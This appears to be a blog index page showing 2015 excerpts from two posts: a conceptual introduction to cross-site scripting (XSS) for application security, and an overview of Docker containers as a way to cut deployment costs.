18Jun2015

Application Security: Cross-site scripting (XSS)

Professional web development standards are very high nowadays. It doesn’t matter how big your team or budget. Application Security is extremely important for project of any size. Huge software companies may even have separate departments working on security tasks only. There are manual code review of existing solutions, automation of scanning for well-known vulnerabilities by special tools, writing unit and integration tests, research the cases, implementation of modern approaches. On the other hand, if you are sole developer in your startup (or even single contributor at all), you have to spend some time playing this role as well.

Sources of the harmful code

Cross-site scripting or XSS is the most widely exploited security hole in Web. At first sight, it seems not very dangerous for Application Security, because there is no obvious way to harm the system or damage the data on the server side. Generally, the main goal of XSS attack is to execute custom JavaScript code in the browser of the user. To be executed, that code have to pass into the page in some way. There are 2 options for hacker to achieve it. First, and the most known, is saving JavaScript code as a part of Web 2.0 content on the server side provided by users of the service.

Read more
02Jun2015

SaaS: Docker as a container solution to reduce deployment costs

There are a lot of hype around containers as a new best technical approach for hosting, development, deployment and testing. Docker [https://www.docker.com] is the most popular container-based solution.

The problem

Nowadays, software developers have a wide range of programming languages, frameworks and other tools to be used to implement various solutions (static web site, web service, analytics database, background workers, queues, etc.). But wait, development is only half of the story. DevOps guy checks out the solution from the repo to deploy it on the server or just to test it on another machine. “Dependencies hell” and other pure technical issues may turn this process into very complicated quest with bunch of traps. On the other hand, there would be many target platforms for deployment (development PC or laptop, cloud hosting, domestic cluster, etc.). Each of platforms may have its own additional deployment and configuration steps. The problem is a huge number of cases (the cartesian product of two sets: development stacks and hosting platforms) both the software developer and the systems administrator have to care about.

Container is a solution

The idea is not absolutely new. In the middle of previous century the trucking industry had almost the same problem of 2 sets: different sizes and shapes of cargo and plenty of transportation approaches. Standard transport container was introduced as universal wrapper for any kind of goods. The trucking industry operates in terms of these standard containers. Software as a Service applies the same idea. Docker helps developer to pack any application with all its dependencies into container and be sure it can be runned anywhere. On the other hand, system administrator have to worry about container environment configuration only and be sure it can run any application within a container.

Read more